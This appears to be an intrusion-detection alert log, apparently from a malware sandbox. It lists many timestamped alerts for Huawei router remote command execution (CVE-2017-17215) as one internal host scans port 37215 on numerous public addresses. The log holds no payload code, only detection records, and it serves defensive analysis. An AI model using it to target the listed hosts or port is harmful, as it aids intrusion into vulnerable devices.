                                            06/14/24-10:44:06.473598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956637215192.168.2.14156.63.39.68
                                            06/14/24-10:44:29.013693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3340637215192.168.2.14197.110.54.150
                                            06/14/24-10:44:12.624816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302837215192.168.2.14197.97.209.161
                                            06/14/24-10:43:39.807896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3294237215192.168.2.1441.145.86.18
                                            06/14/24-10:44:20.806698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5987837215192.168.2.1441.104.238.125
                                            06/14/24-10:43:39.812397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5032637215192.168.2.14156.138.108.172
                                            06/14/24-10:43:45.967921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3715037215192.168.2.14197.63.228.118
                                            06/14/24-10:44:24.942761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142437215192.168.2.14197.28.229.143
                                            06/14/24-10:43:50.113988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3588037215192.168.2.14197.240.162.73
                                            06/14/24-10:43:34.660444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839037215192.168.2.14197.207.188.68
                                            06/14/24-10:43:41.912830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930837215192.168.2.1441.137.157.245
                                            06/14/24-10:44:12.614040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5909037215192.168.2.14197.223.159.80
                                            06/14/24-10:44:00.342616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960837215192.168.2.14156.156.106.96
                                            06/14/24-10:44:22.880170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085637215192.168.2.14156.235.193.209
                                            06/14/24-10:44:33.134249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862837215192.168.2.1441.15.15.78
                                            06/14/24-10:44:18.775420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216837215192.168.2.14197.137.28.149
                                            06/14/24-10:43:36.717214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703437215192.168.2.14156.88.226.133
                                            06/14/24-10:43:48.020770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362437215192.168.2.14156.61.10.211
                                            06/14/24-10:43:34.678917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5687637215192.168.2.1441.237.145.22
                                            06/14/24-10:43:39.789424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242237215192.168.2.14197.178.220.16
                                            06/14/24-10:44:24.913558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612837215192.168.2.1441.231.46.226
                                            06/14/24-10:44:27.001384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062637215192.168.2.14197.96.147.244
                                            06/14/24-10:44:29.014292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3300637215192.168.2.1441.172.105.180
                                            06/14/24-10:44:35.182631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4187837215192.168.2.14197.149.19.119
                                            06/14/24-10:44:29.010986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942837215192.168.2.14197.213.9.208
                                            06/14/24-10:43:54.184183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4565637215192.168.2.14156.198.45.172
                                            06/14/24-10:43:37.763089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5023837215192.168.2.1441.205.159.112
                                            06/14/24-10:43:50.073783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4697837215192.168.2.1441.206.225.114
                                            06/14/24-10:44:27.002049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864837215192.168.2.14197.99.133.171
                                            06/14/24-10:43:36.701809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736637215192.168.2.14156.204.9.25
                                            06/14/24-10:44:10.545405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6044437215192.168.2.14197.42.133.21
                                            06/14/24-10:43:34.662967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422437215192.168.2.14156.83.228.55
                                            06/14/24-10:43:43.941406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093237215192.168.2.1441.119.233.111
                                            06/14/24-10:43:56.225292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805037215192.168.2.14156.63.212.227
                                            06/14/24-10:43:54.202482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874437215192.168.2.14197.111.134.179
                                            06/14/24-10:44:33.133801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5138437215192.168.2.1441.232.254.48
                                            06/14/24-10:43:45.966863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164837215192.168.2.14156.15.139.71
                                            06/14/24-10:43:52.160887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565437215192.168.2.14156.106.25.251
                                            06/14/24-10:44:08.501389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471637215192.168.2.14197.76.14.225
                                            06/14/24-10:43:37.762013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5592837215192.168.2.1441.153.255.196
                                            06/14/24-10:43:45.988117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4792037215192.168.2.14197.232.121.207
                                            06/14/24-10:44:16.716575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239037215192.168.2.1441.193.63.88
                                            06/14/24-10:44:10.565625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5075437215192.168.2.14197.52.160.67
                                            06/14/24-10:43:50.115019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317437215192.168.2.1441.104.212.91
                                            06/14/24-10:44:31.052969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3332837215192.168.2.14197.95.59.126
                                            06/14/24-10:44:14.688131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4429637215192.168.2.14156.121.71.139
                                            06/14/24-10:44:24.917040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660637215192.168.2.14197.75.53.109
                                            06/14/24-10:44:16.736421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810237215192.168.2.14156.215.183.231
                                            06/14/24-10:43:34.661651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503837215192.168.2.1441.83.153.150
                                            06/14/24-10:44:12.643769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4154037215192.168.2.14156.229.6.154
                                            06/14/24-10:44:31.082044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5860637215192.168.2.1441.63.175.69
                                            06/14/24-10:44:14.683713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482637215192.168.2.14156.63.93.89
                                            06/14/24-10:43:52.149403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668437215192.168.2.14197.227.47.110
                                            06/14/24-10:43:43.967063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388037215192.168.2.14156.5.254.183
                                            06/14/24-10:44:20.806607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105437215192.168.2.1441.117.199.21
                                            06/14/24-10:44:26.985613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867437215192.168.2.14156.173.33.68
                                            06/14/24-10:43:52.149745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4815837215192.168.2.14156.8.127.160
                                            06/14/24-10:43:39.790763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5182837215192.168.2.14156.123.179.165
                                            06/14/24-10:44:33.133695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015837215192.168.2.14197.216.177.48
                                            06/14/24-10:43:58.276446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598637215192.168.2.1441.20.142.8
                                            06/14/24-10:43:58.273583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3675237215192.168.2.1441.218.177.185
                                            06/14/24-10:44:29.013828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5555237215192.168.2.1441.223.199.231
                                            06/14/24-10:43:45.968387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009037215192.168.2.14156.172.161.71
                                            06/14/24-10:44:24.941928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821437215192.168.2.14197.141.163.138
                                            06/14/24-10:44:24.934509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5027237215192.168.2.14156.195.169.197
                                            06/14/24-10:43:52.159290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4621237215192.168.2.1441.243.92.93
                                            06/14/24-10:44:33.151829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3311037215192.168.2.14156.240.180.68
                                            06/14/24-10:44:14.668697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4937037215192.168.2.14156.122.81.98
                                            06/14/24-10:43:39.812011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105237215192.168.2.14197.33.210.243
                                            06/14/24-10:43:45.989327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291237215192.168.2.1441.191.125.119
                                            06/14/24-10:44:22.858010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631437215192.168.2.14197.186.66.138
                                            06/14/24-10:43:36.704997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840837215192.168.2.14156.244.195.251
                                            06/14/24-10:43:54.185522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3337837215192.168.2.1441.235.69.233
                                            06/14/24-10:44:33.151068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980237215192.168.2.1441.122.143.235
                                            06/14/24-10:44:04.409767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4387437215192.168.2.14197.153.185.109
                                            06/14/24-10:43:52.143343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6093437215192.168.2.14197.32.205.87
                                            06/14/24-10:43:45.968301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4935237215192.168.2.14197.111.122.209
                                            06/14/24-10:44:24.947165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883637215192.168.2.14197.218.215.168
                                            06/14/24-10:43:34.678194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5833037215192.168.2.14197.210.203.172
                                            06/14/24-10:43:39.790147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334237215192.168.2.1441.124.224.59
                                            06/14/24-10:44:22.879574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3471437215192.168.2.14197.102.254.41
                                            06/14/24-10:43:54.202737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598837215192.168.2.1441.96.124.60
                                            06/14/24-10:43:36.726031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562037215192.168.2.14156.231.239.109
                                            06/14/24-10:43:34.662326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374837215192.168.2.14156.124.39.243
                                            06/14/24-10:43:50.112048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3716437215192.168.2.1441.106.0.63
                                            06/14/24-10:44:04.405826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4811437215192.168.2.1441.18.89.44
                                            06/14/24-10:43:34.679090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542837215192.168.2.14156.230.56.126
                                            06/14/24-10:44:18.766268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5461437215192.168.2.14197.42.59.210
                                            06/14/24-10:43:45.969732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422237215192.168.2.14156.86.161.9
                                            06/14/24-10:43:52.146967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4420637215192.168.2.14156.73.172.179
                                            06/14/24-10:43:52.159682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639237215192.168.2.14197.242.81.4
                                            06/14/24-10:43:37.760406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512837215192.168.2.14156.0.162.30
                                            06/14/24-10:44:24.933624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5532037215192.168.2.14156.101.92.133
                                            06/14/24-10:43:56.244442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913437215192.168.2.1441.251.151.200
                                            06/14/24-10:43:56.230443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4657237215192.168.2.1441.49.82.252
                                            06/14/24-10:44:16.734221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3799237215192.168.2.14156.42.229.58
                                            06/14/24-10:43:37.763305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448437215192.168.2.14197.175.209.107
                                            06/14/24-10:44:33.135112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469837215192.168.2.1441.130.183.53
                                            06/14/24-10:44:12.618753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3876637215192.168.2.14156.108.113.52
                                            06/14/24-10:43:58.295359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5567237215192.168.2.1441.6.58.214
                                            06/14/24-10:44:14.684977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4886237215192.168.2.14197.0.35.136
                                            06/14/24-10:44:27.000161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909237215192.168.2.14156.132.226.156
                                            06/14/24-10:44:06.452551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4613237215192.168.2.1441.104.166.231
                                            06/14/24-10:43:36.724799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844037215192.168.2.14156.135.33.111
                                            06/14/24-10:44:04.410831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558837215192.168.2.1441.6.115.49
                                            06/14/24-10:43:52.165302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5524837215192.168.2.1441.162.62.52
                                            06/14/24-10:44:31.056504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598037215192.168.2.1441.198.222.28
                                            06/14/24-10:43:45.968150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5435237215192.168.2.14156.229.61.85
                                            06/14/24-10:44:06.450950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5010037215192.168.2.1441.48.145.225
                                            06/14/24-10:43:48.021785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890037215192.168.2.1441.28.229.88
                                            06/14/24-10:43:54.199757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721037215192.168.2.14197.29.121.180
                                            06/14/24-10:44:12.624494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3765237215192.168.2.1441.222.254.115
                                            06/14/24-10:43:45.991763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650237215192.168.2.14156.153.81.137
                                            06/14/24-10:44:06.472670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057437215192.168.2.1441.251.124.122
                                            06/14/24-10:43:50.115361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6049637215192.168.2.14197.168.28.34
                                            06/14/24-10:43:52.146726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6094837215192.168.2.14197.144.202.231
                                            06/14/24-10:44:29.014389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3900837215192.168.2.14197.77.136.31
                                            06/14/24-10:44:33.149822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4957437215192.168.2.1441.111.0.232
                                            06/14/24-10:43:36.727041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5675037215192.168.2.14197.36.119.208
                                            06/14/24-10:44:14.668476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710037215192.168.2.1441.232.121.236
                                            06/14/24-10:43:45.989821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5401637215192.168.2.14197.76.127.23
                                            06/14/24-10:44:06.453374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821237215192.168.2.1441.121.91.16
                                            06/14/24-10:44:29.012430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5053837215192.168.2.14197.248.192.249
                                            06/14/24-10:43:37.759355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3283437215192.168.2.14197.34.208.184
                                            06/14/24-10:43:36.717290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4857637215192.168.2.14156.86.252.128
                                            06/14/24-10:44:22.881666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554837215192.168.2.14156.43.92.95
                                            06/14/24-10:44:04.420067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806837215192.168.2.14156.152.164.100
                                            06/14/24-10:43:37.762320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402237215192.168.2.1441.108.17.49
                                            06/14/24-10:43:48.033416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810837215192.168.2.1441.71.86.50
                                            06/14/24-10:44:14.683847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854037215192.168.2.14156.175.31.166
                                            06/14/24-10:43:48.031915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5836037215192.168.2.1441.137.238.77
                                            06/14/24-10:43:37.760871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4030037215192.168.2.14156.175.177.129
                                            06/14/24-10:43:48.033511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3342437215192.168.2.1441.211.206.204
                                            06/14/24-10:43:58.277463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165237215192.168.2.1441.205.128.95
                                            06/14/24-10:44:31.057484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3285837215192.168.2.1441.61.146.222
                                            06/14/24-10:43:52.159935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4289437215192.168.2.14156.138.213.21
                                            06/14/24-10:43:43.944466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223437215192.168.2.1441.98.99.219
                                            06/14/24-10:43:52.149844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3680237215192.168.2.1441.56.77.107
                                            06/14/24-10:44:08.519232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5737837215192.168.2.1441.31.72.225
                                            06/14/24-10:44:24.932818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840837215192.168.2.14156.107.228.94
                                            06/14/24-10:43:39.811669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5004037215192.168.2.14197.27.2.64
                                            06/14/24-10:43:52.165227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370237215192.168.2.1441.223.70.94
                                            06/14/24-10:43:50.074879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5601037215192.168.2.1441.110.126.102
                                            06/14/24-10:44:06.471862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5911637215192.168.2.14156.206.214.10
                                            06/14/24-10:44:06.453619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5051237215192.168.2.1441.228.212.156
                                            06/14/24-10:43:39.792777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4545437215192.168.2.14197.141.166.233
                                            06/14/24-10:43:43.941642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4720637215192.168.2.14156.57.245.11
                                            06/14/24-10:44:16.736392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922437215192.168.2.1441.246.106.8
                                            06/14/24-10:44:16.718465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3386037215192.168.2.14156.54.105.150
                                            06/14/24-10:44:26.980180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327437215192.168.2.14156.174.67.98
                                            06/14/24-10:44:24.917373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595437215192.168.2.14197.195.243.52
                                            06/14/24-10:44:22.861928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5900237215192.168.2.14197.233.62.22
                                            06/14/24-10:43:36.723783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479037215192.168.2.1441.200.83.167
                                            06/14/24-10:44:18.763720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4480637215192.168.2.14197.255.184.226
                                            06/14/24-10:43:36.727963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4022837215192.168.2.14197.118.158.162
                                            06/14/24-10:43:52.160415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4037237215192.168.2.1441.189.105.73
                                            06/14/24-10:44:14.681769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5784437215192.168.2.14197.71.174.224
                                            06/14/24-10:44:35.177043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4271437215192.168.2.14156.214.61.240
                                            06/14/24-10:43:56.227238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4288037215192.168.2.14197.35.237.7
                                            06/14/24-10:44:24.916297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5403237215192.168.2.1441.103.65.205
                                            06/14/24-10:43:48.017549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777437215192.168.2.14156.102.24.170
                                            06/14/24-10:44:26.997354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3442237215192.168.2.1441.207.201.116
                                            06/14/24-10:43:48.031338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4898437215192.168.2.1441.21.60.149
                                            06/14/24-10:43:56.230485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5247837215192.168.2.14156.181.104.42
                                            06/14/24-10:44:04.407944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050837215192.168.2.14197.35.175.67
                                            06/14/24-10:43:52.150907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616037215192.168.2.1441.148.45.59
                                            06/14/24-10:44:31.052881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956437215192.168.2.1441.58.99.252
                                            06/14/24-10:44:06.448898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5153837215192.168.2.1441.90.153.108
                                            06/14/24-10:44:26.986350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5161837215192.168.2.1441.161.142.44
                                            06/14/24-10:44:29.013739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6091437215192.168.2.14197.5.234.124
                                            06/14/24-10:44:04.423436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414037215192.168.2.14197.223.227.82
                                            06/14/24-10:43:37.760895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156237215192.168.2.1441.238.214.92
                                            06/14/24-10:44:16.737876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5369237215192.168.2.1441.167.103.114
                                            06/14/24-10:43:41.847400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419237215192.168.2.1441.65.19.114
                                            06/14/24-10:43:54.200786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786037215192.168.2.14197.58.84.18
                                            06/14/24-10:43:34.677744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5466437215192.168.2.1441.10.51.214
                                            06/14/24-10:43:48.020073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947037215192.168.2.14197.130.241.177
                                            06/14/24-10:44:16.718417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6062037215192.168.2.14156.139.146.203
                                            06/14/24-10:44:16.732547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5510637215192.168.2.14156.42.228.68
                                            06/14/24-10:44:00.325791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5190437215192.168.2.14156.83.52.56
                                            06/14/24-10:43:48.028630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4565037215192.168.2.1441.38.251.129
                                            06/14/24-10:43:37.762619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868837215192.168.2.14197.72.136.48
                                            06/14/24-10:43:41.849860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895437215192.168.2.14197.115.149.12
                                            06/14/24-10:43:45.969340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607637215192.168.2.1441.147.138.218
                                            06/14/24-10:43:52.160400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5484037215192.168.2.14197.133.86.189
                                            06/14/24-10:44:10.564691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236237215192.168.2.1441.162.1.30
                                            06/14/24-10:44:14.669991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446037215192.168.2.14156.132.145.74
                                            06/14/24-10:44:02.367761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3799637215192.168.2.1441.247.142.178
